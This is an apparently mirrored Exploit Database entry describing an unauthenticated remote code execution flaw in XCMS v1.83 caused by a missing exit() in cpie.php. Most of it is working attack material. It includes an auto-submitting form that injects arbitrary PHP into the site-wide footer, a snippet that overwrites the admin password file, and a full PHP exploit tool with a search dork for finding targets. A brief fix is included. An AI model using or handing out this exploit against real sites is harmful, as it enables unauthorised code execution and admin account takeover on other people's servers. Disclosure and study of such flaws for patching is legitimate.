XCMS v1.83 – Remote Command Execution (RCE)

• Exploit Database
• 37 阅读

• 作者： Onurcan
  日期： 2023-04-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51184/

• Exploit Title:XCMS v1.83 - Remote Command Execution (RCE)
  Author: Onurcan
  Email: onurcanalcan@gmail.com
  Site: ihteam.net
  Script Download :http://www.xcms.it
  Date:26/12/2022
  
  The xcms's footer(that is in "/dati/generali/footer.dtb") is included in each page of the xcms.
  Taking "home.php" for example:
   
   <?php
   //home.php
   [...]
   include(CSTR."footer".STR); // <- "CSTR" and "STR" are the constants previously declared. They refers to "/dati/generali" and "dtb"
   ?>
  
  So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel.
  So let's take a look to the bugged code.
  
   <?php
   //cpie.php
   [...]
   if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // <- so miss an exit() :-D
   [...]
   if(isset($_POST['salva'])){
  Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control
   } 
   [...]
   ?>
   
  So with a simple html form we can change the footer.
  Ex:
  
  <form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&pg=admin&s=cpie" method="post">
  <input type="hidden" name="salva" value="OK" />
  <textarea name="testo_0"><?php YOUR PHP CODE ?></textarea>
  <input type="submit" value="Modifica" />
  </form>
  <script>document.editor.submit()</script>
  
  Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials.
   
   
   
  Trick: We can change the admin panel password by inserting this code in the footer:
  
   <?php
   $pwd = "owned"; // <- Place here your new password.
   $pwd2 = md5($pwd);
   unlink("dati/generali/pass.php");
  	 $f = fopen("dati/generali/pass.php",w);
   fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>");
   fclose($f);
   ?>
   
  This code delete the old password file and then create a new one with your new password.
  
  
  Fix:
  
  <?php
   //cpie.php
   [...]
   if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() we can fix the bug.
   [...]
   if(isset($_POST['salva'])){
  Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control
   } 
   [...]
   ?>
  
  So this is a simple exploit:
  
  
  <?php
  if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){
  echo "
  <form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\">
  <input type=\"hidden\" name=\"salva\" value=\"OK\" />
  <textarea name=\"testo_0\">".$_POST['code']."</textarea>
  <input type=\"submit\" value=\"Modifica\" />
  </form>
  <script>document.editor.submit()</script>";
  }else{
  echo"
  <pre>
  XCMS <= v1.82 Remote Command Execution Vulnerability
  Dork:inurl:\"mod=notizie\"
  by Onurcan
  Visit ihteam.net
  </pre>
  <form method=POST action=".$_POST['PHP_SELF'].">
  <pre>
  Site :
  <input type=text name=site />
  Code :
  <textarea name=code cols=49 rows=14>Your code here</textarea>
  <input type=submit value=Exploit />
  <input type=hidden name=\"send\" />
  </pre>
  </form>";	
  }		
  ?>